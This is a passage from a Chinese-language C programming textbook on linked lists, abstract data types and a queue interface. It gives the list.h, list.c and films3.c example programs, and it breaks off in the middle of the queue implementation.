Movie: Devil Dog: The Mound of Hound Rating: 1 Bye! 3.释放链表 在许多环境中,程序结束时都会自动释放malloc()分配的内存。但是, 最好还是成对调用malloc()和free()。因此,程序在清理内存时为每个已分配 的结构都调用了free()函数: current = head; while (current != NULL) { current = head; 1318 head = current->next; free(current); } 17.2.2 反思 films2.c 程序还有些不足。例如,程序没有检查 malloc()是否成功请求 到内存,也无法删除链表中的项。这些不足可以弥补。例如,添加代码检查 malloc()的返回值是否是NULL(返回NULL说明未获得所需内存)。如果程 序要删除链表中的项,还要编写更多的代码。 这种用特定方法解决特定问题,并且在需要时才添加相关功能的编程方 式通常不是最好的解决方案。另一方面,通常都无法预料程序要完成的所有 任务。随着编程项目越来越大,一个程序员或编程团队事先计划好一切模 式,越来越不现实。很多成功的大型程序都是由成功的小型程序逐步发展而 来。 如果要修改程序,首先应该强调最初的设计,并简化其他细节。程序清 单 17.2 中的程序示例没有遵循这个原则,它把概念模型和代码细节混在一 起。例如,该程序的概念模型是在一个链表中添加项,但是程序却把一些细 节(如,malloc()和 current->next 指针)放在最明显的位置,没有突出接 口。如果程序能以某种方式强调给链表添加项,并隐藏具体的处理细节(如 调用内存管理函数和设置指针)会更好。把用户接口和代码细节分开的程 序,更容易理解和更新。学习下面的内容就可以实现这些目标。 1319 17.3 抽象数据类型(ADT) 在编程时,应该根据编程问题匹配合适的数据类型。例如,用int类型代 表你有多少双鞋,用float或 double 类型代表每双鞋的价格。在前面的电影示 例中,数据构成了链表,每个链表项由电影名(C 字符串)和评级(一个int 类型值)。C中没有与之匹配的基本类型,所以我们定义了一个结构代表单 独的项,然后设计了一些方法把一系列结构构成一个链表。本质上,我们使 用 C语言的功能设计了一种符合程序要求的新数据类型。但是,我们的做法 并不系统。现在,我们用更系统的方法来定义数据类型。 什么是类型?类型特指两类信息:属性和操作。例如,int 类型的属性 是它代表一个整数值,因此它共享整数的属性。允许对int类型进行算术操作 是:改变int类型值的符号、两个int类型值相加、相减、相乘、相除、求模。 当声明一个int类型的变量时,就表明了只能对该变量进行这些操作。 注意 整数属性 C的int类型背后是一个更抽象的整数概念。数学家已经用正式的抽象方 式定义了整数的属性。例如,假设N和M是整数,那么N+M=M+N;假设S、 Q也是整数,如果N+M=S,而且N+Q=S,那么M=Q。可以认为数学家提供 了整数的抽象概念,而C则实现了这一抽象概念。注意,实现整数的算术运 算是表示整数必不可少的部分。如果只是储存值,并未在算术表达式中使 用,int类型就没那么有用了。还要注意的是,C并未很好地实现整数。例 如,整数是无穷大的数,但是2字节的int类型只能表示65536个整数。因此, 不要混淆抽象概念和具体的实现。 假设要定义一个新的数据类型。首先,必须提供储存数据的方法,例如 设计一个结构。其次,必须提供操控数据的方法。例如,考虑films2.c程序 (程序清单17.2)。该程序用链接的结构来储存信息,而且通过代码实现了 如何添加和显示信息。尽管如此,该程序并未清楚地表明正在创建一个新类 型。我们应该怎么做? 1320 计算机科学领域已开发了一种定义新类型的好方法,用3个步骤完成从 抽象到具体的过程。 1.提供类型属性和相关操作的抽象描述。这些描述既不能依赖特定的实 现,也不能依赖特定的编程语言。这种正式的抽象描述被称为抽象数据类型 (ADT)。 2.开发一个实现 ADT 的编程接口。也就是说,指明如何储存数据和执 行所需操作的函数。例如在 C中,可以提供结构定义和操控该结构的函数原 型。这些作用于用户定义类型的函数相当于作用于 C基本类型的内置运算 符。需要使用该新类型的程序员可以使用这个接口进行编程。 3.编写代码实现接口。这一步至关重要,但是使用该新类型的程序员无 需了解具体的实现细节。 我们再次以前面的电影项目为例来熟悉这个过程,并用新方法重新完成 这个示例。 17.3.1 建立抽象 从根本上看,电影项目所需的是一个项链表。每一项包含电影名和评 级。你所需的操作是把新项添加到链表的末尾和显示链表中的内容。我们把 需要处理这些需求的抽象类型叫作链表。链表具有哪些属性?首先,链表应 该能储存一系列的项。也就是说,链表能储存多个项,而且这些项以某种方 式排列,这样才能描述链表的第1项、第2项或最后一项。其次,链表类型应 该提供一些操作,如在链表中添加新项。下面是链表的一些有用的操作: 初始化一个空链表; 在链表末尾添加一个新项; 确定链表是否为空; 确定链表是否已满; 1321 确定链表中的项数; 访问链表中的每一项执行某些操作,如显示该项。 对该电影项目而言,暂时不需要其他操作。但是一般的链表还应包含以 下操作: 在链表的任意位置插入一个项; 移除链表中的一个项; 在链表中检索一个项(不改变链表); 用另一个项替换链表中的一个项; 在链表中搜索一个项。 非正式但抽象的链表定义是:链表是一个能储存一系列项且可以对其进 行所需操作的数据对象。该定义既未说明链表中可以储存什么项,也未指定 是用数组、结构还是其他数据形式来储存项,而且并未规定用什么方法来实 现操作(如,查找链表中元素的个数)。这些细节都留给实现完成。 为了让示例尽量简单,我们采用一种简化的链表作为抽象数据类型。它 只包含电影项目中的所需属性。该类型总结如下: 类型名:    简单链表 类型属性:    可以储存一系列项 类型操作:    初始化链表为空 确定链表为空 确定链表已满 确定链表中的项数 1322 在链表末尾添加项 遍历链表,处理链表中的项 清空链表 下一步是为开发简单链表ADT开发一个C接口。 17.3.2 建立接口 这个简单链表的接口有两个部分。第1部分是描述如何表示数据,第2部 分是描述实现ADT操作的函数。例如,要设计在链表中添加项的函数和报告 链表中项数的函数。接口设计应尽量与ADT的描述保持一致。因此,应该用 某种通用的Item类型而不是一些特殊类型,如int或struct film。可以用C的 typedef功能来定义所需的Item类型: #define TSIZE 45 /* 储存电影名的数组大小 */ struct film { char title[TSIZE]; int rating; }; typedef struct film Item; 然后,就可以在定义的其余部分使用 Item 类型。如果以后需要其他数 据形式的链表,可以重新定义Item类型,不必更改其余的接口定义。 定义了 Item 之后,现在必须确定如何储存这种类型的项。实际上这一 步属于实现步骤,但是现在决定好可以让示例更简单些。在films2.c程序中 用链接的结构处理得很好,所以,我们在这里也采用相同的方法: 1323 typedef struct node { Item item; struct node * next; } Node; typedef Node * List; 在链表的实现中,每一个链节叫作节点(node)。每个节点包含形成链 表内容的信息和指向下一个节点的指针。为了强调这个术语,我们把node作 为节点结构的标记名,并使用typedef把Node作为struct node结构的类型名。 最后,为了管理链表,还需要一个指向链表开始处的指针,我们使用typedef 把List作为该类型的指针名。因此,下面的声明: List movies; 创建了该链表所需类型的指针movies。 这是否是定义List类型的唯一方法?不是。例如,还可以添加一个变量 记录项数: typedef struct list { Node * head; /* 指向链表头的指针 */ int size;   /* 链表中的项数 */ } List;      /* List的另一种定义 */ 可以像稍后的程序示例中那样,添加第2 个指针储存链表的末尾。现 1324 在,我们还是使用 List类型的第1种定义。这里要着重理解下面的声明创建 了一个链表,而不一个指向节点的指针或一个结构: List movies; movies代表的确切数据应该是接口层次不可见的实现细节。 例如,程序启动后应把头指针初始化为NULL。但是,不要使用下面这 样的代码: movies = NULL; 为什么?因为稍后你会发现List类型的结构实现更好,所以应这样初始 化: movies.next = NULL; movies.size = 0; 使用List的人都不用担心这些细节,只要能使用下面的代码就行: InitializeList(movies); 使用该类型的程序员只需知道用InitializeList()函数来初始化链表,不必 了解List类型变量的实现细节。这是数据隐藏的一个示例,数据隐藏是一种 从编程的更高层次隐藏数据表示细节的艺术。 为了指导用户使用,可以在函数原型前面提供以下注释: /* 操作:初始化一个链表      */ /* 前提条件:plist指向一个链表*/ /* 后置条件:该链表初始化为空    */ void InitializeList(List * plist); 1325 这里要注意3点。第1,注释中的“前提条件”(precondition)是调用该函 数前应具备的条件。例如,需要一个待初始化的链表。第2,注释中的“后置 条件”(postcondition)是执行完该函数后的情况。第3,该函数的参数是一 个指向链表的指针,而不是一个链表。所以应该这样调用该函数: InitializeList(&movies); 由于按值传递参数,所以该函数只能通过指向该变量的指针才能更改主 调程序传入的变量。这里,由于语言的限制使得接口和抽象描述略有区别。 C 语言把所有类型和函数的信息集合成一个软件包的方法是:把类型定 义和函数原型(包括前提条件和后置条件注释)放在一个头文件中。该文件 应该提供程序员使用该类型所需的所有信息。程序清单 17.3给出了一个简单 链表类型的头文件。该程序定义了一个特定的结构作为Item类型,然后根据 Item定义了Node,再根据Node定义了List。然后,把表示链表操作的函数设 计为接受Item类型和List类型的参数。如果函数要修改一个参数,那么该参 数的类型应是指向相应类型的指针,而不是该类型。在头文件中,把组成函 数名的每个单词的首字母大写,以这种方式表明这些函数是接口包的一部 分。另外,该文件使用第16章介绍的#ifndef指令,防止多次包含一个文件。 如果编译器不支持C99的bool类型,可以用下面的代码: enum bool {false, true}; /* 把bool定义为类型,false和true是该类型的值 */ 替换下面的头文件: #include <stdbool.h> /* C99特性 */ 程序清单17.3 list.h接口头文件 /* list.h -- 简单链表类型的头文件 */ #ifndef LIST_H_ #define LIST_H_ 1326 #include <stdbool.h> /* C99特性      */ /* 特定程序的声明 */ #define TSIZE   45 /* 储存电影名的数组大小  */ struct film { char title[TSIZE]; int rating; }; /* 一般类型定义 */ typedef struct film Item; typedef struct node { Item item; struct node * next; } Node; typedef Node * List; /* 函数原型 */ /* 操作:   初始化一个链 表                       */ 1327 /* 前提条件:  plist指向一个链 表                     */ /* 后置条件:  链表初始化为 空                       */ void InitializeList(List * plist); /* 操作:   确定链表是否为空定义,plist指向一个已初始化的链 表        */ /* 后置条件:  如果链表为空,该函数返回true;否则返回 false         */ bool ListIsEmpty(const List *plist); /* 操作:   确定链表是否已满,plist指向一个已初始化的链 表         */ /* 后置条件:  如果链表已满,该函数返回真;否则返回 假             */ bool ListIsFull(const List *plist); /* 操作:   确定链表中的项数, plist指向一个已初始化的链 表         */ /* 后置条件:  该函数返回链表中的项 数                   */ unsigned int ListItemCount(const List *plist); /* 操作:   在链表的末尾添加 项                     */ 1328 /* 前提条件:  item是一个待添加至链表的项, plist指向一个已初始化 的链表    */ /* 后置条件:  如果可以,该函数在链表末尾添加一个项,且返回 true;否则返回false */ bool AddItem(Item item, List * plist); /* 操作:   把函数作用于链表中的每一 项                  */ /*      plist指向一个已初始化的链 表                 */ /*      pfun指向一个函数,该函数接受一个Item类型的参数, 且无返回值   */ /* 后置条件:  pfun指向的函数作用于链表中的每一项一 次            */ void Traverse(const List *plist, void(*pfun)(Item item)); /* 操作:   释放已分配的内存(如果有的 话)                */ /*      plist指向一个已初始化的链 表                 */ /* 后置条件:  释放了为链表分配的所有内存,链表设置为 空            */ void EmptyTheList(List * plist); #endif 1329 只有InitializeList()、AddItem()和EmptyTheList()函数要修改链表,因此从 技术角度看,这些函数需要一个指针参数。然而,如果某些函数接受 List 类 型的变量作为参数,而其他函数却接受 List类型的地址作为参数,用户会很 困惑。因此,为了减轻用户的负担,所有的函数均使用指针参数。 头文件中的一个函数原型比其他原型复杂: /* 操作:   把函数作用于链表中的每一 项               */ /*      plist指向一个已初始化的链 表              */ /*      pfun指向一个函数,该函数接受一个Item类型的参数, 且无返回值 */ /* 后置条件:  pfun指向的函数作用于链表中的每一项一 次          */ void Traverse(const List *plist, void(*pfun)(Item item)); 参数pfun是一个指向函数的指针,它指向的函数接受item值且无返回 值。第14章中介绍过,可以把函数指针作为参数传递给另一个函数,然后该 函数就可以使用这个被指针指向的函数。例如,该例中可以让pfun指向显示 链表项的函数。然后把Traverse()函数把该函数作用于链表中的每一项,显 示链表中的内容。 17.3.3 使用接口 我们的目标是,使用这个接口编写程序,但是不必知道具体的实现细节 (如,不知道函数的实现细节)。在编写具体函数之前,我们先编写电影程 序的一个新版本。由于接口要使用List和Item类型,所以该程序也应使用这 些类型。下面是编写该程序的一个伪代码方案。 1330 创建一个List类型的变量。 创建一个Item类型的变量。 初始化链表为空。 当链表未满且有输入时: 把输入读取到Item类型的变量中。 在链表末尾添加项。 访问链表中的每个项并显示它们。 程序清单 17.4 中的程序按照以上伪代码来编写,其中还加入了一些错 误检查。注意该程序利用了list.h(程序清单 17.3)中描述的接口。另外,还 需注意,链表中含有 showmovies()函数的代码,它与Traverse()的原型一 致。因此,程序可以把指针showmovies传递给Traverse(),这样Traverse()可 以把showmovies()函数应用于链表中的每一项(回忆一下,函数名是指向该 函数的指针)。 程序清单17.4 films3.c程序 /* films3.c -- 使用抽象数据类型(ADT)风格的链表 */ /* 与list.c一起编译           */ #include <stdio.h> #include <stdlib.h>  /* 提供exit()的原型 */ #include "list.h"   /* 定义List、Item */ void showmovies(Item item); char * s_gets(char * st, int n); 1331 int main(void) { List movies; Item temp; /* 初始化   */ InitializeList(&movies); if (ListIsFull(&movies)) { fprintf(stderr, "No memory available! Bye!\n"); exit(1); } /* 获取用户输入并储存 */ puts("Enter first movie title:"); while (s_gets(temp.title, TSIZE) != NULL &&  temp.title[0] != '\0') { puts("Enter your rating <0-10>:"); scanf("%d", &temp.rating); while (getchar() != '\n') 1332 continue; if (AddItem(temp, &movies) == false) { fprintf(stderr, "Problem allocating memory\n"); break; } if (ListIsFull(&movies)) { puts("The list is now full."); break; } puts("Enter next movie title (empty line to stop):"); } /* 显示    */ if (ListIsEmpty(&movies)) printf("No data entered. "); else { printf("Here is the movie list:\n"); 1333 Traverse(&movies, showmovies); } printf("You entered %d movies.\n", ListItemCount(&movies)); /* 清理    */ EmptyTheList(&movies); printf("Bye!\n"); return 0; } void showmovies(Item item) { printf("Movie: %s  Rating: %d\n", item.title, item.rating); } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) 1334 { find = strchr(st, '\n');  // 查找换行符 if (find)           // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;      // 处理输入行的剩余内容 } return ret_val; } 17.3.4 实现接口 当然,我们还是必须实现List接口。C方法是把函数定义统一放在list.c 文件中。然后,整个程序由 list.h(定义数据结构和提供用户接口的原 型)、list.c(提供函数代码实现接口)和 films3.c (把链表接口应用于特定 编程问题的源代码文件)组成。程序清单17.5演示了list.c的一种实现。要运 行该程序,必须把films3.c和list.c一起编译和链接(可以复习一下第9章关于 编译多文件程序的内容)。list.h、list.c和films3.c组成了整个程序(见图 17.5)。 程序清单17.5 list.c实现文件 /* list.c -- 支持链表操作的函数 */ #include <stdio.h> 1335 #include <stdlib.h> #include "list.h" /* 局部函数原型 */ static void CopyToNode(Item item, Node * pnode); /* 接口函数 */ /* 把链表设置为空 */ void InitializeList(List * plist) { *plist = NULL; } /* 如果链表为空,返回true */ bool ListIsEmpty(const List * plist) { if (*plist == NULL) return true; else return false; } /* 如果链表已满,返回true */ 1336 bool ListIsFull(const List * plist) { Node * pt; bool full; pt = (Node *)malloc(sizeof(Node)); if (pt == NULL) full = true; else full = false; free(pt); return full; } /* 返回节点的数量 */ unsigned int ListItemCount(const List * plist) { unsigned int count = 0; Node * pnode = *plist;  /* 设置链表的开始 */ while (pnode != NULL) { 1337 ++count; pnode = pnode->next; /* 设置下一个节点 */ } return count; } /* 创建储存项的节点,并将其添加至由plist指向的链表末尾(较慢的实 现) */ bool AddItem(Item item, List * plist) { Node * pnew; Node * scan = *plist; pnew = (Node *) malloc(sizeof(Node)); if (pnew == NULL) return false;  /* 失败时退出函数 */ CopyToNode(item, pnew); pnew->next = NULL; if (scan == NULL)    /* 空链表,所以把 */ *plist = pnew;    /* pnew放在链表的开头 */ else 1338 { while (scan->next != NULL) scan = scan->next; /* 找到链表的末尾 */ scan->next = pnew;   /* 把pnew添加到链表的末尾 */ } return true; } /* 访问每个节点并执行pfun指向的函数 */ void Traverse(const List * plist, void(*pfun)(Item item)) { Node * pnode = *plist;  /* 设置链表的开始 */ while (pnode != NULL) { (*pfun)(pnode->item); /* 把函数应用于链表中的项 */ pnode = pnode->next; /* 前进到下一项 */ } } /* 释放由malloc()分配的内存 */ /* 设置链表指针为NULL   */ 1339 void EmptyTheList(List * plist) { Node * psave; while (*plist != NULL) { psave = (*plist)->next;  /* 保存下一个节点的地址  */ free(*plist);       /* 释放当前节点     */ *plist = psave;      /* 前进至下一个节点   */ } } /* 局部函数定义 */ /* 把一个项拷贝到节点中 */ static void CopyToNode(Item item, Node * pnode) { pnode->item = item; /* 拷贝结构 */ } 1340 图17.5 电影程序的3个部分 1.程序的一些注释 list.c文件有几个需要注意的地方。首先,该文件演示了什么情况下使用 1341 内部链接函数。如第12章所述,具有内部链接的函数只能在其声明所在的文 件夹可见。在实现接口时,有时编写一个辅助函数(不作为正式接口的一部 分)很方便。例如,使用CopyToNode()函数把一个Item类型的值拷贝到Item 类型的变量中。由于该函数是实现的一部分,但不是接口的一部分,所以我 们使用 static 存储类别说明符把它隐藏在list.c文件中。接下来,讨论其他函 数。 InitializeList()函数将链表初始化为空。在我们的实现中,这意味着把 List类型的变量设置为NULL。前面提到过,这要求把指向List类型变量的指 针传递给该函数。 ListIsEmpty()函数很简单,但是它的前提条件是,当链表为空时,链表 变量被设置为NULL。因此,在首次调用 ListIsEmpty()函数之前初始化链表 非常重要。另外,如果要扩展接口添加删除项的功能,那么当最后一个项被 删除时,应该确保该删除函数重置链表为空。对链表而言,链表的大小取决 于可用内存量。ListIsFull()函数尝试为新项分配空间。如果分配失败,说明 链表已满;如果分配成功,则必须释放刚才分配的内存供真正的项所用。 ListItemCount()函数使用常用的链表算法遍历链表,同时统计链表中的 项: unsigned int ListItemCount(const List * plist) { unsigned int count = 0; Node * pnode = *plist;  /* 设置链表的开始 */ while (pnode != NULL) { ++count; 1342 pnode = pnode->next; /* 设置下一个节点 */ } return count; } AddItem()函数是这些函数中最复杂的: bool AddItem(Item item, List * plist) { Node * pnew; Node * scan = *plist; pnew = (Node *) malloc(sizeof(Node)); if (pnew == NULL) return false;       /* 失败时退出函数 */ CopyToNode(item, pnew); pnew->next = NULL; if (scan == NULL)       /* 空链表,所以把 */ *plist = pnew;       /* pnew放在链表的开头 */ else { while (scan->next != NULL) 1343 scan = scan->next; /* 找到链表的末尾 */ scan->next = pnew;   /* 把pnew添加到链表的末尾 */ } return true; } AddItem()函数首先为新节点分配空间。如果分配成功,该函数使用 CopyToNode()把项拷贝到新节点中。然后把该节点的next成员设置为NULL。 这表明该节点是链表中的最后一个节点。最后,完成创建节点并为其成员赋 正确的值之后,该函数把该节点添加到链表的末尾。如果该项是添加到链表 的第 1 个项,需要把头指针设置为指向第1项(记住,头指针的地址是传递 给AddItem()函数的第2个参数,所以*plist就是头指针的值)。否则,代码继 续在链表中前进,直到发现被设置为NULL的next成员。此时,该节点就是 当前的最后一个节点,所以,函数重置它的next成员指向新节点。 要养成良好的编程习惯,给链表添加项之前应调用ListIsFull()函数。但 是,用户可能并未这样做,所以在AddItem()函数内部检查malloc()是否分配 成功。而且,用户还可能在调用ListIsFull()和调用AddItem()函数之间做其他 事情分配了内存,所以最好还是检查malloc()是否分配成功。 Traverse()函数与ListItemCount()函数类似,不过它还把一个指针函数作 用于链表中的每一项。 void Traverse (const List * plist, void (* pfun)(Item item) ) { Node * pnode = *plist; /* 设置链表的开始 */ while (pnode != NULL) 1344 { (*pfun)(pnode->item); /* 把函数应用于该项*/ pnode = pnode->next;  /* 前进至下一个项 */ } } pnode->item代表储存在节点中的数据,pnode->next标识链表中的下一个 节点。如下函数调用: Traverse(movies, showmovies); 把showmovies()函数应用于链表中的每一项。 最后,EmptyTheList()函数释放了之前malloc()分配的内存: void EmptyTheList(List * plist) { Node * psave; while (*plist != NULL) { psave = (*plist)->next;  /* 保存下一个节点的地址  */ free(*plist);       /* 释放当前节点     */ *plist = psave;      /* 前进至下一个节点   */ } 1345 } 该函数的实现通过把List类型的变量设置为NULL来表明一个空链表。因 此,要把List类型变量的地址传递给该函数,以便函数重置。由于List已经是 一个指针,所以plist是一个指向指针的指针。因此,在上面的代码中,*plist 是指向Node的指针。当到达链表末尾时,*plist为NULL,表明原始的实际参 数现在被设置为NULL。 代码中要保存下一节点的地址,因为原则上调用了free()会使当前节点 (即*plist指向的节点)的内容不可用。 提示 const的限制 多个处理链表的函数都把const List * plist作为形参,表明这些函数不会 更改链表。这里, const确实提供了一些保护。它防止了*plist(即plist所指 向的量)被修改。在该程序中,plist指向movies,所以const防止了这些函数 修改movies。因此,在ListItemCount()中,不允许有类似下面的代码: *plist = (*plist)->next; // 如果*plist是const,不允许这样做 因为改变*plist就改变了movies,将导致程序无法跟踪数据。然而, *plist和movies都被看作是const并不意味着*plist或movies指向的数据是 const。例如,可以编写下面的代码: (*plist)->item.rating = 3; // 即使*plist是const,也可以这样做 因为上面的代码并未改变*plist,它改变的是*plist指向的数据。由此可 见,不要指望const能捕获到意外修改数据的程序错误。 2.考虑你要做的 现在花点时间来评估ADT方法做了什么。首先,比较程序清单17.2和程 序清单17.4。这两个程序都使用相同的内存分配方法(动态分配链接的结 构)解决电影链表的问题,但是程序清单17.2暴露了所有的编程细节,把 1346 malloc()和prev->next这样的代码都公之于众。而程序清单17.4隐藏了这些细 节,并用与任务直接相关的方式表达程序。也就是说,该程序讨论的是创建 链表和向链表中添加项,而不是调用内存函数或重置指针。简而言之,程序 清单17.4是根据待解决的问题来表达程序,而不是根据解决问题所需的具体 工具来表达程序。ADT版本可读性更高,而且针对的是最终的用户所关心的 问题。 其次,list.h 和 list.c 文件一起组成了可复用的资源。如果需要另一个简 单的链表,也可以使用这些文件。假设你需要储存亲戚的一些信息:姓名、 关系、地址和电话号码,那么先要在 list.h 文件中重新定义Item类型: typedef struct itemtag { char fname[14]; char lname [24]; char relationship[36]; char address [60]; char phonenum[20]; } Item; 然后„„只需要做这些就行了。因为所有处理简单链表的函数都与Item类 型有关。根据不同的情况,有时还要重新定义CopyToNode()函数。例如,当 项是一个数组时,就不能通过赋值来拷贝。 另一个要点是,用户接口是根据抽象链表操作定义的,不是根据某些特 定的数据表示和算法来定义。这样,不用重写最后的程序就能随意修改实 现。例如,当前使用的AddItem()函数效率不高,因为它总是从链表第 1 个 项开始,然后搜索至链表末尾。可以通过保存链表结尾处的地址来解决这个 1347 问题。例如,可以这样重新定义List类型: typedef struct list { Node * head; /* 指向链表的开头 */ Node * end;  /* 指向链表的末尾 */ } List; 当然,还要根据新的定义重写处理链表的函数,但是不用修改程序清单 17.4中的内容。对大型编程项目而言,这种把实现和最终接口隔离的做法相 当有用。这称为数据隐藏,因为对终端用户隐藏了数据表示的细节。 注意,这种特殊的ADT甚至不要求以链表的方式实现简单链表。下面是 另一种方法: #define MAXSIZE 100 typedef struct list { Item entries[MAXSIZE]; /* 项数组 */ int items;         /* 其中的项数 */ } List; 这样做也需要重写list.c文件,但是使用list的程序不用修改。 最后,考虑这种方法给程序开发过程带来了哪些好处。如果程序运行出 现问题,可以把问题定位到具体的函数上。如果想用更好的方法来完成某个 任务(如,添加项),只需重写相应的函数即可。如果需要新功能,可以添 1348 加一个新的函数。如果觉得数组或双向链表更好,可以重写实现的代码,不 用修改使用实现的程序。 1349 17.4 队列ADT 在C语言中使用抽象数据类型方法编程包含以下3个步骤。 1.以抽象、通用的方式描述一个类型,包括该类型的操作。 2.设计一个函数接口表示这个新类型。 3.编写具体代码实现这个接口。 前面已经把这种方法应用到简单链表中。现在,把这种方法应用于更复 杂的数据类型:队列。 17.4.1 定义队列抽象数据类型 队列(queue)是具有两个特殊属性的链表。第一,新项只能添加到链 表的末尾。从这方面看,队列与简单链表类似。第二,只能从链表的开头移 除项。可以把队列想象成排队买票的人。你从队尾加入队列,买完票后从队 首离开。队列是一种“先进先出”(first in,first out,缩写为FIFO)的数据形 式,就像排队买票的队伍一样(前提是没有人插队)。接下来,我们建立一 个非正式的抽象定义: 类型名:    队列 类型属性:    可以储存一系列项 类型操作:    初始化队列为空 确定队列为空 确定队列已满 确定队列中的项数 在队列末尾添加项 1350 在队列开头删除或恢复项 清空队列 17.4.2 定义一个接口 接口定义放在queue.h文件中。我们使用C的typedef工具创建两个类型 名:Item和Queue。相应结构的具体实现应该是queue.h文件的一部分,但是 从概念上来看,应该在实现阶段才设计结构。现在,只是假定已经定义了这 些类型,着重考虑函数的原型。 首先,考虑初始化。这涉及改变Queue类型,所以该函数应该以Queue的 地址作为参数: void InitializeQueue (Queue * pq); 接下来,确定队列是否为空或已满的函数应返回真或假值。这里,假设 C99的stdbool.h头文件可用。如果该文件不可用,可以使用int类型或自己定 义bool类型。由于该函数不更改队列,所以接受Queue类型的参数。但是, 传递Queue的地址更快,更节省内存,这取决于Queue类型的对象大小。这次 我们尝试这种方法。这样做的好处是,所有的函数都以地址作为参数,而不 像 List 示例那样。为了表明这些函数不更改队列,可以且应该使用const限 定符: bool QueueIsFull(const Queue * pq); bool QueueIsEmpty (const Queue * pq); 指针pq指向Queue数据对象,不能通过pq这个代理更改数据。可以定义 一个类似该函数的原型,返回队列的项数: int QueueItemCount(const Queue * pq); 在队列末尾添加项涉及标识项和队列。这次要更改队列,所以有必要 1351 (而不是可选)使用指针。该函数的返回类型可以是void,或者通过返回值 来表示是否成功添加项。我们采用后者: bool EnQueue(Item item, Queue * pq); 最后,删除项有多种方法。如果把项定义为结构或一种基本类型,可以 通过函数返回待删除的项。函数的参数可以是Queue类型或指向Queue的指 针。因此,可能是下面这样的原型: Item DeQueue(Queue q); 然而,下面的原型会更合适一些: bool DeQueue(Item * pitem, Queue * pq); 从队列中待删除的项储存在pitem指针指向的位置,函数的返回值表明 是否删除成功。 清空队列的函数所需的唯一参数是队列的地址,可以使用下面的函数原 型: void EmptyTheQueue(Queue * pq); 17.4.3 实现接口数据表示 第一步是确定在队列中使用何种C数据形式。有可能是数组。数组的优 点是方便使用,而且向数组的末尾添加项很简单。问题是如何从队列的开头 删除项。类比于排队买票的队列,从队列的开头删除一个项包括拷贝数组首 元素的值和把数组剩余各项依次向前移动一个位置。编程实现这个过程很简 单,但是会浪费大量的计算机时间(见图17.6)。 1352 图17.6 用数组实现队列 第二种解决数组队列删除问题的方法是改变队列首端的位置,其余元素 不动(见图17.7)。 1353 图17.7 重新定义首元素 解决这种问题的一个好方法是,使队列成为环形。这意味着把数组的首 尾相连,即数组的首元素紧跟在最后一个元素后面。这样,当到达数组末尾 时,如果首元素空出,就可以把新添加的项储存到这些空出的元素中(见图 17.8)。可以想象在一张条形的纸上画出数组,然后把数组的首尾粘起来形 成一个环。当然,要做一些标记,以免尾端超过首端。 1354 图17.8 环形队列 1355 另一种方法是使用链表。使用链表的好处是删除首项时不必移动其余元 素,只需重置头指针指向新的首元素即可。由于我们已经讨论过链表,所以 采用这个方案。我们用一个整数队列开始测试: typedef int Item; 链表由节点组成,所以,下一步是定义节点: typedef struct node { Item item; struct node * next; } Node; 对队列而言,要保存首尾项,这可以使用指针来完成。另外,可以用一 个计数器来记录队列中的项数。因此,该结构应由两个指针成员和一个int类 型的成员构成: typedef struct queue { Node * front; /* 指向队列首项的指针 */ Node * rear; /*指向队列尾项的指针*/ int items;    /* 队列中的项数*/ } Queue; 注意,Queue是一个内含3个成员的结构,所以用指向队列的指针作为参 数比直接用队列作为参数节约了时间和空间。 1356 接下来,考虑队列的大小。对链表而言,其大小受限于可用的内存量, 因此链表不要太大。例如,可能使用一个队列模拟飞机等待在机场着陆。如 果等待的飞机数量太多,新到的飞机就应该改到其他机场降落。我们把队列 的最大长度设置为10。程序清单17.6包含了队列接口的原型和定义。Item类 型留给用户定义。使用该接口时,可以根据特定的程序插入合适的定义。 程序清单17.6 queue.h接口头文件 /* queue.h -- Queue的接口 */ #ifndef _QUEUE_H_ #define _QUEUE_H_ #include <stdbool.h> // 在这里插入Item类型的定义,例如 typedef int Item;   // 用于use_q.c // 或者 typedef struct item {int gumption; int charisma;} Item; #define MAXQUEUE 10 typedef struct node { Item item; struct node * next; } Node; typedef struct queue 1357 { Node * front; /* 指向队列首项的指针  */ Node * rear; /* 指向队列尾项的指针  */ int items;  /* 队列中的项数     */ } Queue; /* 操作:   初始化队列                  */ /* 前提条件:  pq 指向一个队列                */ /* 后置条件:  队列被初始化为空               */ void InitializeQueue(Queue * pq); /* 操作:   检查队列是否已满               */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  如果队列已满则返回true,否则返回false     */ bool QueueIsFull(const Queue * pq); /* 操作:   检查队列是否为空               */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  如果队列为空则返回true,否则返回false     */ bool QueueIsEmpty(const Queue *pq); /* 操作:   确定队列中的项数               */ 1358 /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  返回队列中的项数               */ int QueueItemCount(const Queue * pq); /* 操作:   在队列末尾添加项               */ /* 前提条件:  pq 指向之前被初始化的队列            */ /*      item是要被添加在队列末尾的项          */ /* 后置条件:  如果队列不为空,item将被添加在队列的末 尾,    */ /*      该函数返回true;否则,队列不改变,该函数返回false*/ bool EnQueue(Item item, Queue * pq); /* 操作:   从队列的开头删除项              */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  如果队列不为空,队列首端的item将被拷贝到*pitem中 */ /*      并被删除,且函数返回true;           */ /*      如果该操作使得队列为空,则重置队列为 空      */ /*      如果队列在操作前为空,该函数返回false       */ 1359 bool DeQueue(Item *pitem, Queue * pq); /* 操作:   清空队列                   */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  队列被清空                  */ void EmptyTheQueue(Queue * pq); #endif 1.实现接口函数 接下来,我们编写接口代码。首先,初始化队列为空,这里“空”的意思 是把指向队列首项和尾项的指针设置为NULL,并把项数(items成员)设置 为0: void InitializeQueue(Queue * pq) { pq->front = pq->rear = NULL; pq->items = 0; } 这样,通过检查items的值可以很方便地了解到队列是否已满、是否为 空和确定队列的项数: bool QueueIsFull(const Queue * pq) { 1360 return pq->items == MAXQUEUE; } bool QueueIsEmpty(const Queue * pq) { return pq->items == 0; } int QueueItemCount(const Queue * pq) { return pq->items; } 把项添加到队列中,包括以下几个步骤: (1)创建一个新节点; (2)把项拷贝到节点中; (3)设置节点的next指针为NULL,表明该节点是最后一个节点; (4)设置当前尾节点的next指针指向新节点,把新节点链接到队列 中; (5)把rear指针指向新节点,以便找到最后的节点; (6)项数加1。 函数还要处理两种特殊情况。第一种情况,如果队列为空,应该把front 